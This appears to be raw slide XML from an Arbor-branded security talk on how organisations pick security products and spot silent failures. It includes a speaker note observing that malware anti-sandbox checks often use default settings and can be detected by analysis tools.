      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3454324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Security that fails doesn’t send an event</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They all have weaknesses &amp; flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You’ve piled the sandbag high, what backs that up?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look for alternative ways for the failure of other technologies to be visible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="876382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GUI/User experience (should be more important than it used to, they are all old now)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Management features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pretty reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RFP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyst suggestion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What you’ve used before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRICE$$$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3476944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Analysts/Gartner MQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>NSSLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, ICSA, SC Magazine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Your buddy gave you a tip on the golf course?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Marketing actually worked? (impressive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Sales guy actually good? (doubtful)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Have a really awesome security partner that gives you good advice?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Have a really crappy security “partner” that just sells you a false sense of security?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2615906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600" dirty="0" smtClean="0"/>
              <a:t>Just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>freakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>’ fix it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Make it go away</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Surely a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>blinky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> box will fix the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Compelling event</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2396098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my slide to intro that I am</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> removing the “A” from CIA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3928519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E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2794078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213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3494900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213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2521350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The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> “AntiS” as they are called here are fairly common in such malware and they typically work unless the analysis infrastructure has been tweaked to avoid the countermeasure. Often attackers use the default settings which can make finding such malware easier when dealing with an infection. Legitimate applications don’t typically try to detect a virtual environment, which ironically works against people that use such settings because automated and static analysis tools can detect such techniques and work around them. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2171377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file://localhost/Volumes/Studio/Work2/Arbor/4523%20ARBOR%20Wired%20Mag%20PPT/Slides/cover.jpg" TargetMode="Externa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0F4ABA-3E7D-2046-BA0C-DEC34A1325D7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/6/2014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244EEE-C19F-5A49-91D5-84600712583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0" y="0"/>
            <a:ext cx="9144000" cy="68736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60038" y="4226587"/>
            <a:ext cx="8060436" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="71B53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60038" y="4823723"/>
            <a:ext cx="8060436" cy="461665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="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4" name="Picture 15" descr="arbor logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6331573" y="608118"/>
            <a:ext cx="2257415" cy="634190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="leaves_ppt.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5682025" cy="402178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E4F6114-FE43-B34A-B99B-6F1FD61370EE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="155358"/>
            <a:ext cx="8489904" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="2234458"/>
          </a:xfr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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="1014984"/>
            <a:ext cx="8476029" cy="2234458"/>
          </a:xfr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AE4F6114-FE43-B34A-B99B-6F1FD61370E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2246" y="2014868"/>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342246" y="1247852"/>
            <a:ext cx="7772400" cy="767016"/>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AE4F6114-FE43-B34A-B99B-6F1FD61370E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8371" y="10149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149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AE4F6114-FE43-B34A-B99B-6F1FD61370E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28371" y="101498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28371" y="1706270"/>
            <a:ext cx="4040188"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01498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706270"/>
            <a:ext cx="4041775"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE4F6114-FE43-B34A-B99B-6F1FD61370E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AE4F6114-FE43-B34A-B99B-6F1FD61370E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2" name="cover.jpg" descr="/Volumes/Studio/Work2/Arbor/4523 ARBOR Wired Mag PPT/Slides/cover.jpg"/>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0" y="1045472"/>
            <a:ext cx="9156578" cy="5294361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9149332" cy="10246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p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5377688"/>
            <a:ext cx="9149332" cy="14803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Arbor_Leaf_Yellow.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="21434856">
            <a:off x="6896874" y="964940"/>
            <a:ext cx="2309655" cy="846873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Arbor_Leaf_Orange.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20558257">
            <a:off x="8134928" y="2681282"/>
            <a:ext cx="1100606" cy="465923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Arbor_Leaf_Blue.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383216" y="2422692"/>
            <a:ext cx="1387438" cy="531851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Arbor_Leaf_Blue.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2425206">
            <a:off x="7210402" y="-203200"/>
            <a:ext cx="1387438" cy="531851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Arbor_Leaf_Green.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458526" y="323878"/>
            <a:ext cx="1490072" cy="586095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="Arbor_Leaf_Green.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20232015">
            <a:off x="7389859" y="2592944"/>
            <a:ext cx="1490072" cy="586095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="Arbor_Leaf_Green.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19282520">
            <a:off x="5593352" y="3157329"/>
            <a:ext cx="729559" cy="286960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Arbor_Leaf_Orange.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19327481">
            <a:off x="7966332" y="1565842"/>
            <a:ext cx="1409549" cy="596709"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="Arbor_Leaf_Orange.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20801607">
            <a:off x="6079101" y="3519300"/>
            <a:ext cx="603136" cy="255327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="Arbor_Leaf_Red.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="email">
            <a:alphaModFix amt="88000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19145277">
            <a:off x="6189524" y="3278701"/>
            <a:ext cx="1242380" cy="459056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="Arbor_Leaf_Red.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19670313">
            <a:off x="8468288" y="485447"/>
            <a:ext cx="1242380" cy="459056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:scene3d>
            <a:camera prst="isometricRightUp"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="Arbor_Leaf_Green.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18454861">
            <a:off x="6746006" y="1411233"/>
            <a:ext cx="1024705" cy="422347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="Arbor_Leaf_Orange.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
